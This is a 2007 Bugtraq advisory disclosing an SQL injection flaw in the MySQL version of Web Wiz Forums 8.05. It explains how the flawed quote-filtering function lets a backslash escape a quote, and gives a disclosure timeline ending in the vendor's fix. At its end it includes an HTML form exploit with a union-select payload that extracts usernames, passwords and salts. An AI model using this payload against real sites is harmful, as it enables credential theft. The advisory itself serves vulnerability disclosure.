Web Wiz Forums 8.05 (MySQL version) SQL Injection
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Web Wiz Forums 8.05 (MySQL version) SQL Injection
- From: "Ivan Fratric" <ifsecure@xxxxxxxxx>
- Date: Tue, 20 Mar 2007 14:53:16 +0100
- Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=GQZm6k0CiAdcNztP+0w04zVTKppS2oR9LoIDKpLCJ2WvLeNOTLIikRQG9/kAxhbEjTxfIJu1oMu6hqL/81i4F0ZAxUPtppSzc2nocEylUp29A49xEMrmlFKSpGuaE/qP3ii9g32SNKiJUGseVS7Bh5zE92p27sbc4SAsg47zASY=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=omUET49y2EJEkKiWdvqQr4RyZRotG3BT05eB5YhX6A7SfT86+gUKxFLLLubW4GvgsU3JA4FEaFa/DAlOeWkip6EshLvPDDxpBMN0RipMCcGIwJWczuseZpzYohDvk+nJNVHtc69zoY/l93ogTdsiPFpdjhA5lynhuBTHbYFhnhU=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
There is a vulnerability in MySQL version of Web Wiz Forums, free ASP
bulletin board system software, enabling SQL injection. The
vulnerability is in the code used to filter string parameters prior to
including them in the SQL queries:
'Format SQL Query funtion
Private Function formatSQLInput(ByVal strInputEntry)
'Remove malisous charcters from sql
strInputEntry = Replace(strInputEntry, "\'", "\'", 1, -1, 1)
strInputEntry = Replace(strInputEntry, """", "", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "'", "''", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "[", "[", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "]", "]", 1, -1, 1)
strInputEntry = Replace(strInputEntry, "<", "<", 1, -1, 1)
strInputEntry = Replace(strInputEntry, ">", ">", 1, -1, 1)
'Return
formatSQLInput = strInputEntry
End Function
Assume the user enters a string containing the following sequence of
characters: \"' (a backslash, followed by a double quote followed by a
single quote). The first line inside the function above would do
nothing, the second line would remove the double quote, and after the
third line the sequence would look like \'' (a backslash followed by
two single quotes). In MySQL the first two characters would be
interpreted as an escaped single quote and the third character would
terminate the quotes thus allowing injection of arbitrary SQL code
placed after it.
Only the MySQL version of the Web Wiz Forums is vulnerable to this as
SQL Server and MS Access don't use backslash as an escape character.
Below I include a small exploit that demonstrates this vulnerability.
Mar 19th 2007: Vulnerability discovered
Mar 20th 2007: Vendor contacted
Mar 20th 2007: Vendor responded
Mar 20th 2007: Vendor released fixed version (8.05a)
Discovered and reported by Ivan Fratric
http://ifsec.blogspot.com/
<form method="post" action="http://localhost/forum/pop_up_member_search.asp?">
<input type="hidden" name="name" id="name" value="\"' union
select concat(userusernamename,char(58),passpasswordword,char(58),sasaltlt)
from tblautauthorhor /*" >
<input type="submit" value="Go">
</form>